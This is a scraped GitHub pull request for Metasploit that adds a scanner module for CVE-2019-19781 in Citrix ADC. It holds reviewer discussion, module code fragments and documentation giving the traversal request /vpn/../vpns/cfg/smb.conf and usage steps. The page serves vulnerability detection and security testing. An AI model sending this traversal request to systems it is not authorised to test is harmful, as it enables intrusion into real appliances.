-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add citrix_directory_traversal module to /modules/auxiliary/scanner/h… #12813
Conversation
Hi! Thanks for this. We'll be making some final changes to the module and landing with #12816, using this module as the exploit's |
Hi! Thanks for your message. Please let us know if we can help with additional documentation or anything else at this stage. And it would indeed be great if you could keep us updated about when and in what form you will be including the module. Thanks in advance! |
@kalba-security: If you could write module documentation, that would be a task off my list. FYI, there are some sweeping functional and stylistic changes that need to be done in order to merge this. I'll keep you posted before anything hits |
def initialize | ||
super( | ||
'Name' => 'Citrix ADC Directory Traversal', | ||
'Description' => 'This module exploits a directory traversal vulnerability (CVE-2019-19781) within Citrix ADC (NetScalers). It requests the smb.conf file located in the /vpns/cfg directory by issuing the request /vpn/../vpns/cfg/smb.conf. It then checks if the server is vulnerable by looking for the presense of a "global" variable in smb.conf, which this file should always contain.', |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I've updated the code to check for global
, since this check is not currently present. Please stand by until I can push my commits for viewing. Thanks!
@wvu-r7 Hey, I have the documentation ready. Let me know if I can add it now.
Otherwise I won't be able to do it until tomorrow.
…On Monday, 13 January 2020, ♄ ***@***.***> wrote:
***@***.**** commented on this pull request.
------------------------------
In modules/auxiliary/scanner/http/citrix_directory_traversal.rb
<#12813 (comment)>
:
> +# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+ # Exploit mixins should be called first
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::WmapScanServer
+ # Scanner mixin should be near last
+ include Msf::Auxiliary::Scanner
+ include Msf::Auxiliary::Report
+
+ def initialize
+ super(
+ 'Name' => 'Citrix ADC Directory Traversal',
+ 'Description' => 'This module exploits a directory traversal vulnerability (CVE-2019-19781) within Citrix ADC (NetScalers). It requests the smb.conf file located in the /vpns/cfg directory by issuing the request /vpn/../vpns/cfg/smb.conf. It then checks if the server is vulnerable by looking for the presense of a "global" variable in smb.conf, which this file should always contain.',
I've updated the code to check for global, since this check is not
currently present. Please stand by until I can push my commits for viewing.
Thanks!
—
You are receiving this because you were mentioned.
Reply to this email directly, view it on GitHub
<#12813?email_source=notifications&email_token=ANKL6M4M2K2KCX4U2E2FMV3Q5TFPPA5CNFSM4KFUMX52YY3PNVWWK3TUL52HS4DFWFIHK3DMKJSXC5LFON2FEZLWNFSXPKTDN5WW2ZLOORPWSZGOCRSFDPQ#pullrequestreview-342118846>,
or unsubscribe
<https://github.com/notifications/unsubscribe-auth/ANKL6M4RXDZKPYFCH2GQD73Q5TFPPANCNFSM4KFUMX5Q>
.
|
@kalba-security: Feel free to push the docs! Thanks! |
You ROCK! Thank you so much. I'll update the docs if the code changes can be reflected. |
Here is the updated code: master...wvu-r7:pr/12813. I'm happy to explain and justify anything. I will need to merge all of this in the next couple hours. |
Looks good!!! @wvu-r7. Quick question, we're not allowed to put email addresses or Twitter handles in by chance are we? Can't remember if that was restricted or not. |
Yeah looks great @wvu-r7!! In the documentation I already referenced the global check you added btw. |
@altjx: Nope, but it's okay to tack them on as a comment! What Twitter handles do y'all want to use? It's easier to avoid conflicts if I make the commit. Sorry for the situation. :( |
Btw, we're planning to convert all |
Sounds great! We can use the following:
No worries! I'm on a plane anyway so I wouldn't be able to do it LOL. Thanks so much! |
I've improved the |
Gotcha! |
Release NotesThis adds a scanner for CVE-2019-19781, a directory traversal vulnerability in Citrix Application Delivery Controller (NetScaler). |
Off to finish #12816! |
You can find the module in the tree at https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/http/citrix_dir_traversal.rb. |
Thanks so much!! @wvu-r7 I apologize but I typod my Twitter handle. should have been @altonjx sorry about that |
Doh! No problem, let me fix that for ya. |
Thanks again!! 🙏🏽 |
All fixed. :-) |
|
||
Because vulnerable servers allow for directory traversal, they will accept the request `GET /vpn/../vpns/` and process it as a request for `GET /vpns/`, a directory that contains PERL scripts that can be targeted to allow for limited file writing on the vulnerable host. | ||
|
||
This module checks if a target server is vulnerable by issuing an HTTP GET request for `/vpn/../vpns/cfg/smb.conf`and then checking the response for `global`since this configuration file should contain global variables. If ``global``is found, the server is vulnerable to CVE-2019-19781. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This module checks if a target server is vulnerable by issuing an HTTP GET request for `/vpn/../vpns/cfg/smb.conf`and then checking the response for `global`since this configuration file should contain global variables. If ``global``is found, the server is vulnerable to CVE-2019-19781. | |
This module checks if a target server is vulnerable by issuing an HTTP GET request for `/vpn/../vpns/cfg/smb.conf`and then checking the response for `global` since this configuration file should contain global variables. If `global` is found, the server is vulnerable to CVE-2019-19781. |
1. `Proxies` . This option is not set by default. | ||
2. `RPORT` . The default setting is `80`. To use: `set RPORT [PORT]` | ||
3. `SSL` . The default setting is `false`. | ||
4. `THREADS` . The default setting is `1`. | ||
5. `VHOST` . This option is not set by default. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
'Erik Wynter', | ||
'altonjx', |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Traditionally, the author's role is provided in comments. ie:
[
'someone', # discovery and PoC
'someone else', # metasploit
]
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This one's fair.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Addressing over in #12816.
@bcoles: Please review against |
A Also, |
Yes, future-proofing. Indeed ridiculous for a single branch. I have other cases I would like to add, but I reached a deadline. ETA: It was originally just |
Screw it. I added the |
Since it's not documentation anywhere else, the files have been renamed to So, use
|
The files were renamed while merging into See f1cc40b from #12813 (comment), tbh. I understand everyone wants the code, but PRs are technically WIP until they're merged. Updating is the responsibility of the user in that case. So thanks for dropping a note! The rest of y'all are slackers. ;) |
About
This change adds a new module to /modules/auxiliary/scanner/http/ that can be used to verify whether or not a web server is vulnerable to CVE-2019-19781 - a directory traversal in in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. For more info about this vulnerability, see: https://nvd.nist.gov/vuln/detail/CVE-2019-19781
Vulnerable System
Citrix ADC (NetScalers) systems vulnerable to directory traversal (CVE-2019-19781).
Verification Steps
use auxiliary/scanner/http/citrix_directory_traversal
set RHOSTS [target IP or hostname]
run
200
is received, it will indicate that the target is vulnerable to CVE-2019-19781.Options
Proxies
. This option is not set by default.RPORT
. The default setting is80
. To use:set RPORT [target port, default is 80]
SSL
. The default setting isfalse
.THREADS
. The default setting is1
.VHOST
. This option is not set by default.Scenarios